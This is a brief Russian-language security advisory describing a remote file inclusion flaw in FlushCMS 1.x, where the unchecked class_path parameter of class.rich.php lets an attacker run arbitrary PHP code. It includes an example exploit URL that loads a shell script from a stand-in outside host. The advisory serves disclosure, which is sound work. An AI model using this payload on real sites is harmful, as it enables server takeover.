Программа: FlushCMS 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе. Данные, переданные в параметре class_path скрипта class.rich.php не проверяются, в результате атакующий может подключить произвольный локальный или внешний файл. Для работы требуется что бы опция "register_globals" была включена.

Пример:

http://www.site.com/flushcmd/Include/editor/rich_files/ class.rich.php?class_path=http://www.shell.com/shell.txt?



Оставить мнение